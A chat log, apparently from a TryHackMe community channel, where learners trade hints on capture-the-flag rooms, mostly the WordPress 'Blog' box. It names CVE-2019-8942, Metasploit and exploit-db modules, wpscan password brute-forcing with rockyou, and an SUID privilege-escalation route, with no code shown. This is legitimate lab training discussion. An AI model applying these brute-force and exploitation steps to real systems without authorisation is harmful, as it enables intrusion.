Any hint would be appreciated.
did you try anything?
TryHackMe Walkthrough Link: https://tryhackme.com/room/zthlinux Learn Linux is a great introductory room from Paradox. As the name suggests, it gives a nice foundation for Linux skills. This is a walkthrough room, so I'm not going to go into a huge amount of detail about the c...
It's solution 😦
any hints?? for ra room
can anyone explain to me how exactly I make a GET request with the path as stated above?
Have you considered googling how to make a GET request?
Or looking back through the content in the room, where it explains how?
obviously
but I was in school a bit slow already
I will try one more time tho, and come back very mad when I still havent figured it out, hope that is ok
hey can anyone help me with the last part of the cc:radare2 room
I can't seem to find anything
Did anyone manage to exploit Blog manually and get command execution? I am stuck at the last part, calling the post i just made with cmd. Not getting the same post request as the PoC on github
I didn't fully succeed with that but I want to get the manual exploitation part done for the writeup soon™
the JS script didn't properly send the payload I think
Yeah same, stuck there. I tried adding cmd=id or whatever as part of the json request but only getting the contents of the page
If you make it work please share the blog post with me 
if I can't get it to work I might make a python/js script for that
I looked into the js exploit you have already in kali, or the metasploit module. Seems to check out tho
yeah
Cool. I'll keep an eye out. Thanks for that
if you want to progress now you might want to try the metasploit module as I didn't see any other PoCs for this one
Yeah already did, rooted now. Was exploring other options to keep myself busy 
How long should the bruteforce for blog take?
Hello, I have a question for Blog, the new room, just Yes or No. Is there any binary reverse engineering involved, or can't I figure it out?
it's useful but not necessarily required
^
Is it guaranteed that the exploit to get onto the blog box is ||CVE-2019-8942||
yes
Yes
rip I tried it and it didn't wanna work so I went down the rabbit hole of ||SMB shares||
did you try to do it manually?
js script?
the one from exploitdb, ye, but I couldn't figure out how to embed the shell
sure
Is there a list of THM blue-team rooms anywhere? Things like SIEM, malware analysis, digital forensics, phishing, IR, etc
Blue Primer.
alright
@green sorrel You may need to change the ||payload||
room Blog, please hint for www-data -> bjoel
hint: skip bjoel
direct root?
@wooden mist I am getting nowhere.. any hint
suid
ok
any hint on the Blog room? I have the username ||bjoel||, have been brute-forcing the login page but no luck
there are some more users
@sinful plaza
@sinful plaza Manual enumeration of WordPress environments sometimes gets in the way more than it helps, try an automated tool like wpscan to do this job, it will give you what you need to climb another step in the room
@merry helm thanks a lot bro let me use wpscan
Feels good to see everyone trying out Blog lol
Hello guys, I need some help with Blog. I have a problem with my meterpreter session. Thanks.
What’s wrong with your session?
Thank you for the answer. I have an error when I want to go into the directory with the user.txt. Stdapi_fs_stat
Did you check the permissions of the directory where user.txt is? You won’t be able to access it as a low level user.
Ok thank you, I will check that.
No problem 👍🏼 happy to help.
billy
Wrong chat.
I meant Billy Joel (blog.thm) hint?
The room title is Blog.
damn. my bad
Hints depend on what stage you're at
You can't get a hint if we don't know what part you're at
@stuck fractal thanks for correction, yes the room name is Blog.
I think I am on the first stage (trying to get USER.txt and then ROOT.txt), tried various password combos to get into the WP admin portal, but PASS fails. in my enum phase I got the WordPress version, WordPress valid usernames, rabbit hole (smb), QR code etc...
what direction should I look for ?
You should have two users.
indeed, yes !
hmmm ok. I use wpscan mostly 😕
I hope I found the valid pass in ROCKYOU.txt.
lets see !
If you need to brute force on tryhackme, the password will be in rockyou
And it will take under 5 minutes to get it.
@stuck fractal Thanks 👍
for helping a newbie.
If it takes more than 5 minutes, you're usually doing something wrong.
got it. understood.
5-8 minutes is the baseline. I got it.
5 minutes is the limit for room creators
thanks for this info.
Can confirm it should only take about 2 minutes with 64 threads
@verbal wedge 64 threads gulps
I ran one user for 7 minutes
then canceled it, now running 2nd user
lets see
Be aware, 5 minutes is for a decent computer so if you don’t get the password and are stuck let them run for 10 minutes instead
@trim haven hmmm
IMO the creators should take this into consideration, and decrease the time limit to 2 to 2:30 minutes
They shouldn’t, you shouldn’t be hacking on a slow computer.
lol
I’m sure your computer is fine but some people hack on old laptops which is why I’m telling you to be aware
I did purposely lower it
I had originally selected a password further down in rockyou that was taking only 4 minutes ish for me
But when a tester tested it it was taking a loooong time
because of VPN, 4 minutes may get translated into more than 4 minutes!
(i think)
so, I don't think it's about having a FAST CPU or not, the traffic on VPN is usually slow 😕
It would contribute a slight amount of time but not that much I don't think
hmm, maybe you're right .
Also you said you were trying for bjoel
His password won't be crackable
At least not using rockyou
lol. I got it
Which is the standard
Now comes the hard part lol
🤦♂️